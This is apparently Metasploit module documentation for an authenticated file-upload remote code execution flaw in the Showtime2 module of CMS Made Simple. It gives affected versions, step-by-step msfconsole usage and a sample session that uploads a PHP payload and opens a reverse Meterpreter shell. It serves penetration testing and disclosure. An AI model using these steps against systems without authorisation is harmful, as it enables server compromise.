## Description

This module exploits a File Upload vulnerability that lead in a RCE in Showtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS). An authenticated user with "Use Showtime2" privilege could exploit the vulnerability.

The vulnerability exists in the Showtime2 module, where the class "class.showtime2_image.php" does not ensure that a watermark file has a standard image file extension (GIF, JPG, JPEG, or PNG).

Tested on Showtime2 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0, 3.4.5, 3.4.3, 3.4.2 on CMS Made Simple (CMSMS) 2.2.9.1 and 2.2.10

## Vulnerable Application

Affecting Showtime2 CMS Made Simple (CMSMS) module, version 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0, 3.4.5, 3.4.3, 3.4.2

## Verification Steps

1. Setting up a working installation of CMS Made Simple (CMSMS)
2. Download Showtime2 module (< 3.6.3)
3. Log-in to admin panel with the administrator credentials
4. Go in *site admin* => *Module Manager* and import the Showtime2 module
5. Once the module is uploaded, click on *install* to install the module
6. [OPTIONALLY] setting up a new user, assign it to a group and set the *Use Showtime2* permissions on group
7. Start `msfconsole`
8. `use exploit/multi/http/cmsms_showtime2_rce`
9. `set RHOST <IP>`
10. `set USERNAME <USERNAME>`
11. `set PASSWORD <PASSWORD>`
12. `check`
13. You should see `The target appears to be vulnerable.`
14. `exploit`
15. You should get a meterpreter session!

## Options

* **TARGETURI**: Path to CMS Made Simple (CMSMS) App installation (“/” is the default)
* **USERNAME**: Username to authenticate with
* **PASSWORD**: Password to authenticate with

## Scenario

### Tested on Showtime 3.6.2 on CMS Made Simple (CMMS) 2.2.10

```
msf5 > use exploit/multi/http/cmsms_showtime2_rce 
msf5 exploit(multi/http/cmsms_showtime2_rce) > set rhost target.com
rhost => target.com
msf5 exploit(multi/http/cmsms_showtime2_rce) > check

[*] Showtime2 version: 3.6.2
[*] 192.168.2.59:80 - The target appears to be vulnerable.
msf5 exploit(multi/http/cmsms_showtime2_rce) > set username Designer
username => Designer
msf5 exploit(multi/http/cmsms_showtime2_rce) > set password d3s1gn3r
password => d3s1gn3r
msf5 exploit(multi/http/cmsms_showtime2_rce) > exploit

[*] Started reverse TCP handler on 10.0.8.2:4444 
[*] Showtime2 version: 3.6.2
[*] Uploading PHP payload.
[*] Making request for '/06wp7Fen.php' to execute payload.
[*] Sending stage (38247 bytes) to 192.168.2.59
[*] Meterpreter session 1 opened (10.0.8.2:4444 -> 192.168.2.59:59932) at 2019-03-19 23:27:07 +0100
[!] Tried to delete ./06wp7Fen.php, unknown result

meterpreter > getuid
Server username: www-data (33)
meterpreter > quit
[*] Shutting down Meterpreter...

[*] 192.168.2.59 - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(multi/http/cmsms_showtime2_rce) > 
```
